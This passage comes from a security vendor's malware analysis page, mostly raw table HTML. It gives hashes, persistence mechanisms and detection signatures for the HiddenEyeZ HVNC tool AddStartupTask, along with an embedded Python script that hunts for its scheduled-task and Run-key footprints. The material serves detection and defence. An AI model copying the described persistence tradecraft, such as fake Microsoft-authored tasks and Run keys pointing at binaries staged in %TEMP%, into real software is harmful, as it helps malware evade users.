class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: 
rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">5368a0fe20ac61149f28dc1a3a9ff829<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper 
remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">9127a299c46593f9e0de1f409b2a44e72aa5f6c4<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_36997657\" rowspan=\"1\" colspan=\"1\" class=\"td_class_36997657\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_36997657\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: 
auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66951413\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66951413\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66951413\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">469e25f46030d6fb3b04e83b095b5c8e09017e39c40bc584920e324fd87d0700<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_97969899\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97969899\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97969899\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i 
class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61574672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61574672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61574672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">3072:mN1U+fpbH6rA0LZQy5hYajNFhEwQ6rKXSWdQqxfZ8heWycJ5DfwrxS4wr8isBhHC:21U+fs2ajNTOrlR4ithyT\/TM2aa3<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Overview<\/h4>\n<p>This tool, deployed and used by HiddenEyeZ HVNC, is responsible for the latter's persistence. 
It guarantees the malware an automatic start, either at user logon or periodically, once a day at a fixed time.<\/p>\n<p>To do so, three persistence mechanisms are used:<\/p>\n<ul>\n<li>the creation of a periodic scheduled task that tries to pass itself off as a Windows component:\n<ul>\n<li>Author: Microsoft<\/li>\n<li>Description: This will keep your software up to date.<\/li>\n<\/ul>\n<\/li>\n<li>the creation of a scheduled task that runs when a user logs on;<\/li>\n<li>the registration of the binary in the registry key <code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run<\/code>.<\/li>\n<\/ul>\n<p>This binary handles both installing and removing the persistence mechanisms for the HiddenEyeZ HVNC malware.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414172\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 25: installation code for the AddStartupTask persistence mechanism<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Usage<\/h4>\n<p>When used by the HiddenEyeZ HVNC malware, AddStartupTask is dropped at <code>%TEMP%\\proclog.exe<\/code>. It is then launched through a <code>%TEMP%\\drive.bat<\/code> script. 
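The three persistence mechanisms listed above, together with the %TEMP% staging path, give a defender concrete artefacts to hunt for. The following Python script is an added example, not code from the original article nor from HiddenEyeZ: it parses the XML that `schtasks /query /xml /tn <name>` exports and the text that `reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` prints, and flags tasks whose description matches the string above, tasks registered with a bare "Microsoft" author whose action runs outside Windows or Program Files, and logon- or daily-triggered tasks and Run values whose target sits in a temp or public folder. The task names, the user `alice` and the `update.exe` path in the embedded samples are constructed for the example; the "bare Microsoft author" and "staging folder" rules are the editor's heuristics, not indicators published by the article.

```python
"""Hunt for the AddStartupTask persistence pattern: a daily task registered with
Author "Microsoft", a second task fired at logon, and an HKCU Run value, all
pointing at a binary staged in a user-writable folder (added example, constructed input)."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Exact task description reported in the article for the HiddenEyeZ task.
HIDDENEYEZ_DESCRIPTION = "This will keep your software up to date."
# Folders an unprivileged dropper can write to and legitimate autostarts rarely
# use. AppData\Local alone is deliberately absent: OneDrive, Teams etc. live there.
STAGING_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\",
                "\\users\\public\\", "%temp%", "%tmp%")
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\",
                "%windir%\\", "%systemroot%\\", "%programfiles%\\")

def exe_path(command_line: str) -> str:
    """Return just the executable from a command line, quoted or not."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]

def in_staging_dir(path: str) -> bool:
    return any(d in path.lower() for d in STAGING_DIRS)

def in_trusted_dir(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)

def analyze_task(task_name: str, task_xml: str) -> list:
    """Return (task_name, reason) findings for one exported task."""
    root = ET.fromstring(task_xml)
    author = root.findtext("t:RegistrationInfo/t:Author", "", TASK_NS).strip()
    desc = root.findtext("t:RegistrationInfo/t:Description", "", TASK_NS).strip()
    has_logon = root.find("t:Triggers/t:LogonTrigger", TASK_NS) is not None
    has_daily = root.find("t:Triggers/t:CalendarTrigger/t:ScheduleByDay", TASK_NS) is not None
    reasons = []
    if desc == HIDDENEYEZ_DESCRIPTION:
        reasons.append("description matches the HiddenEyeZ task string")
    for cmd in root.findall("t:Actions/t:Exec/t:Command", TASK_NS):
        exe = exe_path(cmd.text or "")
        # Heuristic: genuine Microsoft tasks are authored "Microsoft Corporation" (or a
        # localized resource string) and run from Windows / Program Files.
        if author == "Microsoft" and not in_trusted_dir(exe):
            reasons.append(f"author 'Microsoft' but action runs outside trusted dirs: {exe}")
        if (has_logon or has_daily) and in_staging_dir(exe):
            reasons.append(f"{'logon' if has_logon else 'daily'}-triggered task runs from a staging folder: {exe}")
    return [(task_name, r) for r in reasons]

# One `reg query` output line: <indent><name>  <REG_SZ|REG_EXPAND_SZ>  <data>
RUN_LINE = re.compile(r"^\s+(?P<name>.+?)\s{2,}REG_(?:EXPAND_)?SZ\s{2,}(?P<data>.+)$")

def analyze_run_key(reg_output: str) -> list:
    """Return (value_name, reason) findings for a `reg query ...\\Run` dump."""
    findings = []
    for line in reg_output.splitlines():
        m = RUN_LINE.match(line)
        if m and in_staging_dir(exe_path(m["data"])):
            findings.append((m["name"], f"Run value points into a staging folder: {m['data']}"))
    return findings

def hunt(tasks: dict, run_key_dump: str) -> list:
    """Apply both checks; `tasks` maps task path -> exported XML text."""
    findings = []
    for name, xml_text in tasks.items():
        findings.extend(analyze_task(name, xml_text))
    return findings + analyze_run_key(run_key_dump)

# Constructed samples for this example: task names, user and update.exe are invented.
XMLNS = 'xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"'
SAMPLE_TASKS = {
    # Daily task posing as a Windows component, as described in the article.
    r"\SoftwareUpdateCheck": rf"""<Task version="1.2" {XMLNS}>
  <RegistrationInfo><Author>Microsoft</Author>
    <Description>This will keep your software up to date.</Description></RegistrationInfo>
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\Users\alice\AppData\Local\Temp\update.exe</Command></Exec></Actions>
</Task>""",
    # Second task fired at user logon, pointing at the same staged binary.
    r"\SoftwareUpdateLogon": rf"""<Task version="1.2" {XMLNS}>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions><Exec><Command>C:\Users\alice\AppData\Local\Temp\update.exe</Command></Exec></Actions>
</Task>""",
    # Benign built-in task: trusted author, command under %windir%.
    r"\Microsoft\Windows\Defrag\ScheduledDefrag": rf"""<Task version="1.4" {XMLNS}>
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Actions><Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>""",
}
RUN_KEY_DUMP = r"""
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater     REG_SZ    C:\Users\alice\AppData\Local\Temp\update.exe
"""

if __name__ == "__main__":
    for where, why in hunt(SAMPLE_TASKS, RUN_KEY_DUMP):
        print(f"[!] {where}: {why}")
```

On a real host, feed one `schtasks /query /xml /tn <name>` export per task into `SAMPLE_TASKS` and a `reg query` dump into `RUN_KEY_DUMP`. The benign OneDrive entry is included on purpose: it autostarts from AppData\Local, so treating that whole folder as a staging area would drown the HiddenEyeZ hits in noise, which is why only Temp and Public paths are listed in STAGING_DIRS.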
After this execution, both files are deleted from disk.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414177\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 26: HiddenEyeZ HVNC code executing the AddStartupTask tool<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>Stormshield protections against the HiddenEyeZ malware<\/h2>\n<h3>Stormshield Network Security protections via network traffic<\/h3>\n<p>Access to the HiddenEyeZ HVNC C2 is blocked, as it is categorised as malware by our IP reputation databases. 
In addition, Stormshield Network Security (SNS) firewalls can filter communications to various services, used here by the attacker:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_9\"\n     id='ninja_table_builder_414269'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_9\"\n     style=\"\n     max-height:500px;\n     max-width: 1160px;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414269\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6534036\" class=\"desktop-view tr_class_6534036 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_57652678\" rowspan=\"1\" colspan=\"1\" class=\"td_class_57652678\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_57652678\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Service \/ Malware<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td 
id=\"td_id_69658489\" rowspan=\"1\" colspan=\"1\" class=\"td_class_69658489\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_69658489\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Signature<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7165364\" class=\"desktop-view tr_class_7165364 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_40459981\" rowspan=\"1\" colspan=\"1\" class=\"td_class_40459981\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_40459981\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">StormKitty C&amp;C server<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_14080508\" rowspan=\"1\" colspan=\"1\" class=\"td_class_14080508\" style=\"padding: 10px; max-width: 200px; min-width: 200px; 
border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_14080508\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">http:client:header.226<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8946599\" class=\"desktop-view tr_class_8946599 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_83747915\" rowspan=\"1\" colspan=\"1\" class=\"td_class_83747915\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_83747915\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Telegram server<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_99646158\" rowspan=\"1\" colspan=\"1\" class=\"td_class_99646158\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_99646158\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" 
style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">tcpudp:hostname.154 \/ ssl:client:sni.25<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3297669\" class=\"desktop-view tr_class_3297669 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_56522342\" rowspan=\"1\" colspan=\"1\" class=\"td_class_56522342\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_56522342\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Discord server<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_91924302\" rowspan=\"1\" colspan=\"1\" class=\"td_class_91924302\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_91924302\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; 
text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssl:client:sni.24 \/ tcpudp:hostname.153 \/ ssl:server:certificate.102<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Stormshield Network Security protections via the built-in antivirus<\/h3>\n<p>Here are the SNS signatures detecting the various samples via the built-in antivirus:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_10\"\n     id='ninja_table_builder_414268'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_10\"\n     style=\"\n     max-height:500px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414268\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_4966789\" class=\"desktop-view tr_class_4966789 \" style=\"background: 
rgb(221, 221, 221);\"><!----> <td id=\"td_id_90222141\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90222141\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90222141\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27780105\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27780105\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27780105\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Signature<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1495381\" class=\"desktop-view tr_class_1495381 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_46876070\" rowspan=\"1\" colspan=\"1\" class=\"td_class_46876070\" style=\"padding: 10px; max-width: 200px; min-width: 
200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_46876070\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Installer r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_77333311\" rowspan=\"1\" colspan=\"1\" class=\"td_class_77333311\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_77333311\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan.GenericKD.65601994<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i 